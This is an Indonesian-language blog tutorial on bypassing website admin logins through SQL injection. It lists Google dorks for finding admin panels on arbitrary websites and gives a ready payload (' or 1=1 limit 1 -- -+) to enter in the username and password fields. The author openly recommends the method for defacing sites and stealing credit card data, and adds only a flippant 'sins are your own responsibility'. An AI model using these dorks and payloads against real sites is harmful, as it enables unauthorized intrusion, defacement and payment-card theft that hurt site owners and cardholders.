Oke, kali ini saya mau share tutorial SQLi Bypass Login 😀 . Dengan teknik ini, kita bisa login ke halaman admin suatu website tanpa perlu memasukkan user dan password yang dibuat oleh admin. Udah lama sih tutorial ini saya dapat 😀 . Baru sempet share aja . hehehe. Oke langsung saja ke tutorialnya 🙂 .
Google Dork :
inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
Kembangin lagi dorknya ya 🙂
Langkah langkah :
Nah, kalo udah dapet salahsatu web nya, kita login dengan user dan password berikut :
user : ‘ or 1=1 limit 1 — -+
pass : ‘ or 1=1 limit 1 — -+
Jika vuln, pasti masuk halaman admin kok 🙂
Gampang sekali bukan ?
Cara ini sebenarnya banyak manfaatnya. Selain buat yang hobi deface sana sini, yang mau cari credit card pakai cara ini juga terbukti ampuh 😀
Tapi inget, dosa tanggung sendiri. 😉
Sekian tutorial kali ini . Terimakasih 🙂
